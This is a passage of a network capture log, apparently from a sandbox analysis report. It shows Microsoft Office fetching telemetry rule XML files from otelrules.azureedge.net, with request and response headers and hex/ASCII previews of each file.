2024-11-05 17:46:10 UTC	192	OUT	GET /rules/rule701200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:10 UTC	517	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:10 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDC681E17" x-ms-request-id: 081c3a8e-a01e-0053-58d2-2c8603000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174610Z-16547b76f7fxdzxghC1DFWmf7n00000005gg00000000pv6g x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:10 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
86	192.168.2.4	49824	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:10 UTC	192	OUT	GET /rules/rule700201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:11 UTC	494	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:10 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT ETag: "0x8DC582BE39DFC9B" x-ms-request-id: 89e70e23-001e-0014-478e-2d5151000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174610Z-15869dbbcc6zbpm7hC1DFWrx5s000000021000000000n5h9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:11 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"

Session ID	Source IP	Source Port	Destination IP	Destination Port
87	192.168.2.4	49825	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:11 UTC	192	OUT	GET /rules/rule700200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:11 UTC	494	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:11 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF66E42D" x-ms-request-id: 45f39ff0-c01e-00a2-2d5f-2e2327000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174611Z-15869dbbcc68l9dbhC1DFWgc3n000000022g00000000ctdc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:11 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.4	49826	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:11 UTC	192	OUT	GET /rules/rule702351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:11 UTC	517	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:11 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE017CAD3" x-ms-request-id: 3caab4b0-601e-005c-26d2-2cf06f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174611Z-16547b76f7fp6mhthC1DFWrggn00000005g000000000rygq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:11 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.2.4	49828	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:11 UTC	192	OUT	GET /rules/rule701251v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:11 UTC	538	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:11 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT ETag: "0x8DC582BDE12A98D" x-ms-request-id: 43524f19-601e-003e-07d2-2c3248000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174611Z-16547b76f7fm7xw6hC1DFW5px4000000059000000000vzx3 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:11 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.2.4	49829	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:11 UTC	192	OUT	GET /rules/rule701250v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:11 UTC	517	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:11 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE022ECC5" x-ms-request-id: 70b2909d-801e-00ac-33c1-2cfd65000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174611Z-16547b76f7fp46ndhC1DFW66zg00000005g000000000fq1u x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:11 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.4	49830	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:12 UTC	192	OUT	GET /rules/rule700051v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:12 UTC	538	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:12 GMT Content-Type: text/xml Content-Length: 1389 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE10A6BC1" x-ms-request-id: 8f98044c-301e-006e-14bd-2cf018000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174612Z-16547b76f7f22sh5hC1DFWyb4w00000005fg0000000016ch x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:12 UTC	1389	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.2.4	49831	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:12 UTC	192	OUT	GET /rules/rule700050v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:12 UTC	538	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:12 GMT Content-Type: text/xml Content-Length: 1352 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT ETag: "0x8DC582BE9DEEE28" x-ms-request-id: 96da997d-001e-0028-355d-2cc49f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174612Z-16547b76f7fknvdnhC1DFWxnys00000005k0000000006f9t x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:12 UTC	1352	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T

Session ID	Source IP	Source Port	Destination IP	Destination Port
93	192.168.2.4	49832	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:12 UTC	192	OUT	GET /rules/rule702951v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:12 UTC	494	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:12 GMT Content-Type: text/xml Content-Length: 1405 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE12B5C71" x-ms-request-id: fa11cbea-401e-0064-1a55-2e54af000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174612Z-17df447cdb59mt7dhC1DFWqpg400000001hg00000000k7h2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:12 UTC	1405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke

Session ID	Source IP	Source Port	Destination IP	Destination Port
94	192.168.2.4	49833	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:12 UTC	192	OUT	GET /rules/rule702950v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:12 UTC	517	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:12 GMT Content-Type: text/xml Content-Length: 1368 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDDC22447" x-ms-request-id: ddaecdfb-101e-0079-21d2-2c5913000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174612Z-16547b76f7fsjlq8hC1DFWehq0000000055g00000000s4xk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:12 UTC	1368	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=

Session ID	Source IP	Source Port	Destination IP	Destination Port
95	192.168.2.4	49835	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:13 UTC	192	OUT	GET /rules/rule701150v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:13 UTC	538	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:13 GMT Content-Type: text/xml Content-Length: 1364 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE1223606" x-ms-request-id: 98909b4d-d01e-002b-39d2-2c25fb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174613Z-16547b76f7f9rdn9hC1DFWfk7s00000005a000000000zf00 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:13 UTC	1364	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
96	192.168.2.4	49834	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:13 UTC	192	OUT	GET /rules/rule701151v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:13 UTC	494	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:13 GMT Content-Type: text/xml Content-Length: 1401 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE055B528" x-ms-request-id: bcab188a-c01e-0014-325f-2ea6a3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174613Z-17df447cdb5vp9l9hC1DFW0nrw00000001tg000000008bkw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
